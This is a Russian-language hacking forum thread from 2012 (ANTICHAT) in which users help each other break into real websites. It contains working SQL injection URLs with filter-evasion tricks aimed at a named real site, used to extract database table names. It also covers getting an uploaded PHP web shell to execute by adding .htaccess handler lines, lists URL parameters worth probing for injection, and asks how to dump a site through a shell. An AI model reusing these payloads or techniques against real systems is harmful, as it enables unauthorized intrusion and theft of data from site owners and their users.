ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.04.2012, 17:03
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
Провел на форуме:
354141
Репутация:
0
|
|
ок спасибо, буду пробовать
|
|
|
20.04.2012, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...
|
|
|
|
20.04.2012, 17:52
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от smirk
smirk said:
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...
Там union не фильтруется. нет правна просмотр schema.tables.
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.columns+wher e+column_name+like+0x25696425--+
|
|
|
|
20.04.2012, 19:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его
http://сайт.ру/userfiles/image/222_20110623183746.php
открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess?
если да то с каким содержимым?
|
|
|
|
20.04.2012, 19:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
попробуй с таким содержимым
Код:
Code:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
|
|
|
|
21.04.2012, 08:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
9763
Репутация:
8
|
|
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:
Код:
Code:
id
page
num
name
p
n
нужно найти еще парочку популярных |
|
|
|
21.04.2012, 10:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Сообщение от \/ITA
\/ITA said:
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:
Код:
Code:
id
page
num
name
p
n
нужно найти еще парочку популярных Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c - 31 900 000
cat - 21 300 000
category - 7 560 000
CatID - 4 850 000
pagina - 3 660 000
PID - 2 180 000
sn - 116 000
catalogid - 12 600
|
|
|
|
21.04.2012, 11:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
9763
Репутация:
8
|
|
Сообщение от mix0x0
mix0x0 said:
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
спасибо за подсказку
нашел скулю в POST на одном сайте подставил site.ru?id=1"
выдает мне такое:
Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query :
INSERT INTO
ips(ip, cnt, last_url)
VALUES("***.93.28.***", 1,"/?id=1"")
ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""
я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?
|
|
|
|
21.04.2012, 11:27
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от mix0x0
mix0x0 said:
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
Сканеры - гавно, лучше руками искать.
|
|
|
|
21.04.2012, 12:15
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049
Репутация:
0
|
|
Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
хееелп ми
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
